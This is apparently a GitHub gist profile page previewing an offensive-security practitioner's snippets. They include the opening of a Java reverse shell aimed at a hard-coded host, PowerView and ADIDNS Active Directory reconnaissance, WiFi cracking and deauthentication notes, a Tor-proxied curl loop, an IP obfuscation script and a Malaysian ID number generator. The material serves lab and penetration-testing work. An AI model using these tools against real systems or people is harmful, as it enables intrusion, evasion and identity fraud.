Skip to content

Instantly share code, notes, and snippets.

View faisalfs10x's full-sized avatar
🎯
Focusing

Faisal Fs ⚔️ faisalfs10x

🎯
Focusing
View GitHub Profile
@faisalfs10x
faisalfs10x / C.java
Created December 14, 2021 09:02 — forked from caseydunham/C.java
Java Reverse Shell
// Not sure where I originally got this from.
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class C {
public C() throws Exception {
String host="10.0.0.90";
@faisalfs10x
faisalfs10x / PowerView-3.0-tricks.ps1
Created June 27, 2022 04:30 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@faisalfs10x
faisalfs10x / WiFi-assessment-note.md
Last active May 20, 2023 06:39
WiFi assessment notes

WiFi-Pentest-Cheat-Sheet

Hits Repo: https://github.com/faisalfs10x/WiFi-Pentest-Cheat-Sheet

Useful Term/Tool:
    airmon-ng - To enable/disable monitor mode on wireless interfaces
    aireplay-ng - To inject packets into a wireless network, deauthentications attack
    airodump-ng - Wireless packet capture tool used for packet capturing of raw 802.11 frames

aircrack-ng - A 802.11 WEP / WPA-PSK key cracker

@faisalfs10x
faisalfs10x / adidns_records.py
Last active October 6, 2022 09:39 — forked from 3xocyte/adidns_records.py
get /etc/hosts entries from ADIDNS - port to py3
#!/usr/bin/env python
import argparse
import sys
import binascii
import socket
import re
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES
# get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte)
sudo apt-get install -y proxychains4 tor
# update /etc/proxychains-tor.conf and /etc/tor/torrc with the given config
# restart tor service
sudo systemctl restart tor.service
# test the connection with proxychains + tor
while true; do proxychains -q -f /etc/proxychains-tor.conf curl ifconfig.me \n; done
@faisalfs10x
faisalfs10x / ip2dec.py
Created March 26, 2023 09:21
Obfuscate IP address to decimal
#!/usr/bin/python3
# Obfuscate IP address to decimal
import sys
ip_address = sys.argv[1]
# Convert IP address, split into 4 list as a zero-padded 2-digit hex and join list with no separator.
hex_ip = ''.join(['{:02x}'.format(int(i)) for i in ip_address.split('.')])
@faisalfs10x
faisalfs10x / generate-nric.py
Created April 15, 2023 06:52 — forked from RamadhanAmizudin/generate-nric.py
Malaysian's Identification Number Generation Tool
#!/usr/bin/env python3
#
# Malaysian's Identification Number Generation Tool.
# Copyright (C) 2022
#
# MIT License
#
import argparse
from datetime import date, timedelta
<#
Meta
Date: 2022 March 28th
Authors: Dray Agha (Twitter @purp1ew0lf)
Company: Huntress Labs
Purpose: Automate setting up Sysmon and pulling Ippsec's sysmon IoC streamliner. Great for malware lab.
#>
function admin_check{
if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(`

Set up an HTB (Hack The Box) OpenVPN client in Ubuntu 18 to act as a VPN gateway and forward traffic from your LAN, which includes a Kali machine, to the internal network of HTB.


  • Problem: OpenVPN allow single connection concurrently to connect to the HTB lab. Hence, we can't distribute the OpenVPN config file to others as it will kick out the previously connected user.
  • What to expect: Able to share connection with multiple clients within the same network to HTB lab via Ubuntu server as VPN gateway.
  • Issue to expect: 1) Could not establish reverse shell directly to Kali machine.
  • Workaround: 1) Use port forwarder eg, use socat or iptables in Ubuntu gateway and forward to Kali machine